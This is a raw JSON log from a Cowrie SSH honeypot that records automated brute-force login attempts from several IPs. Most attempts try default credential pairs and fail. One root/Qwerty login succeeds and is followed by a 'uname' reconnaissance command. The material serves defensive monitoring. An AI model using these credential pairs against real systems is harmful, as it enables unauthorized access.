{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36344,"dst_ip":"1.2.3.4","dst_port":22,"session":"24f205ee90d8","protocol":"ssh","message":"New connection: 212.227.235.229:36344 (1.2.3.4:22) [session: 24f205ee90d8]","sensor":"my-vps","timestamp":"2025-08-26T11:47:36.878867Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:36.967402Z","src_ip":"212.227.235.229","session":"24f205ee90d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54716,"dst_ip":"1.2.3.4","dst_port":22,"session":"1acea7e70655","protocol":"ssh","message":"New connection: 212.227.125.160:54716 (1.2.3.4:22) [session: 1acea7e70655]","sensor":"my-vps","timestamp":"2025-08-26T11:47:40.519865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:40.616443Z","src_ip":"212.227.125.160","session":"1acea7e70655"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:40.617120Z","src_ip":"212.227.125.160","session":"1acea7e70655"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456789","message":"login attempt [ubuntu/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:40.961546Z","src_ip":"212.227.125.160","session":"1acea7e70655"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:42.023198Z","src_ip":"212.227.125.160","session":"1acea7e70655"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55482,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d38542b1fdf","protocol":"ssh","message":"New connection: 212.227.125.160:55482 (1.2.3.4:22) [session: 5d38542b1fdf]","sensor":"my-vps","timestamp":"2025-08-26T11:47:45.689264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:45.727746Z","src_ip":"212.227.125.160","session":"5d38542b1fdf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:45.789165Z","src_ip":"212.227.125.160","session":"5d38542b1fdf"}
{"eventid":"cowrie.login.failed","username":"hestiamail","password":"hestiamail","message":"login attempt [hestiamail/hestiamail] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:46.020534Z","src_ip":"212.227.125.160","session":"5d38542b1fdf"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:47.347591Z","src_ip":"212.227.125.160","session":"5d38542b1fdf"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34832,"dst_ip":"1.2.3.4","dst_port":22,"session":"27dad15c6b0b","protocol":"ssh","message":"New connection: 83.168.105.65:34832 (1.2.3.4:22) [session: 27dad15c6b0b]","sensor":"my-vps","timestamp":"2025-08-26T11:47:49.307108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:49.307997Z","src_ip":"83.168.105.65","session":"27dad15c6b0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:49.348556Z","src_ip":"83.168.105.65","session":"27dad15c6b0b"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37620,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d6854fe3f03","protocol":"ssh","message":"New connection: 196.251.86.249:37620 (1.2.3.4:22) [session: 9d6854fe3f03]","sensor":"my-vps","timestamp":"2025-08-26T11:47:49.398949Z"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:49.472054Z","src_ip":"83.168.105.65","session":"27dad15c6b0b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:50.048811Z","src_ip":"196.251.86.249","session":"9d6854fe3f03"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:47:50.148394Z","src_ip":"196.251.86.249","session":"9d6854fe3f03"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:50.514273Z","src_ip":"83.168.105.65","session":"27dad15c6b0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56258,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b7f5cddab68","protocol":"ssh","message":"New connection: 212.227.125.160:56258 (1.2.3.4:22) [session: 0b7f5cddab68]","sensor":"my-vps","timestamp":"2025-08-26T11:47:52.150485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:52.151365Z","src_ip":"212.227.125.160","session":"0b7f5cddab68"}
{"eventid":"cowrie.login.failed","username":"git","password":"password","message":"login attempt [git/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:52.157800Z","src_ip":"196.251.86.249","session":"9d6854fe3f03"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:52.207085Z","src_ip":"212.227.125.160","session":"0b7f5cddab68"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:52.362893Z","src_ip":"212.227.125.160","session":"0b7f5cddab68"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:53.413673Z","src_ip":"212.227.125.160","session":"0b7f5cddab68"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:53.750574Z","src_ip":"196.251.86.249","session":"9d6854fe3f03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57026,"dst_ip":"1.2.3.4","dst_port":22,"session":"609de540036a","protocol":"ssh","message":"New connection: 212.227.125.160:57026 (1.2.3.4:22) [session: 609de540036a]","sensor":"my-vps","timestamp":"2025-08-26T11:47:57.462069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:47:57.467512Z","src_ip":"212.227.125.160","session":"609de540036a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:47:57.516226Z","src_ip":"212.227.125.160","session":"609de540036a"}
{"eventid":"cowrie.login.failed","username":"ssm-user","password":"ssm-user","message":"login attempt [ssm-user/ssm-user] failed","sensor":"my-vps","timestamp":"2025-08-26T11:47:57.717083Z","src_ip":"212.227.125.160","session":"609de540036a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:47:58.807215Z","src_ip":"212.227.125.160","session":"609de540036a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57794,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a44b90936d5","protocol":"ssh","message":"New connection: 212.227.125.160:57794 (1.2.3.4:22) [session: 9a44b90936d5]","sensor":"my-vps","timestamp":"2025-08-26T11:48:03.379355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:03.380538Z","src_ip":"212.227.125.160","session":"9a44b90936d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:03.436634Z","src_ip":"212.227.125.160","session":"9a44b90936d5"}
{"eventid":"cowrie.login.failed","username":"slurm","password":"slurm","message":"login attempt [slurm/slurm] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:03.589660Z","src_ip":"212.227.125.160","session":"9a44b90936d5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:04.642195Z","src_ip":"212.227.125.160","session":"9a44b90936d5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":39696,"dst_ip":"1.2.3.4","dst_port":22,"session":"42bae239a726","protocol":"ssh","message":"New connection: 83.168.105.65:39696 (1.2.3.4:22) [session: 42bae239a726]","sensor":"my-vps","timestamp":"2025-08-26T11:48:04.853996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:04.854823Z","src_ip":"83.168.105.65","session":"42bae239a726"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:04.891672Z","src_ip":"83.168.105.65","session":"42bae239a726"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:05.004292Z","src_ip":"83.168.105.65","session":"42bae239a726"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:06.043899Z","src_ip":"83.168.105.65","session":"42bae239a726"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58560,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dfb6ab7fc4d","protocol":"ssh","message":"New connection: 212.227.125.160:58560 (1.2.3.4:22) [session: 4dfb6ab7fc4d]","sensor":"my-vps","timestamp":"2025-08-26T11:48:08.798046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:08.798922Z","src_ip":"212.227.125.160","session":"4dfb6ab7fc4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:08.861230Z","src_ip":"212.227.125.160","session":"4dfb6ab7fc4d"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:48:09.016833Z","src_ip":"212.227.125.160","session":"4dfb6ab7fc4d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:48:09.202346Z","src_ip":"212.227.125.160","session":"4dfb6ab7fc4d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:48:09.203202Z","src_ip":"212.227.125.160","session":"4dfb6ab7fc4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:09.254247Z","src_ip":"212.227.125.160","session":"4dfb6ab7fc4d"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:09.256148Z","src_ip":"212.227.125.160","session":"4dfb6ab7fc4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59332,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d19876ed19e","protocol":"ssh","message":"New connection: 212.227.125.160:59332 (1.2.3.4:22) [session: 8d19876ed19e]","sensor":"my-vps","timestamp":"2025-08-26T11:48:14.623575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:14.624540Z","src_ip":"212.227.125.160","session":"8d19876ed19e"}
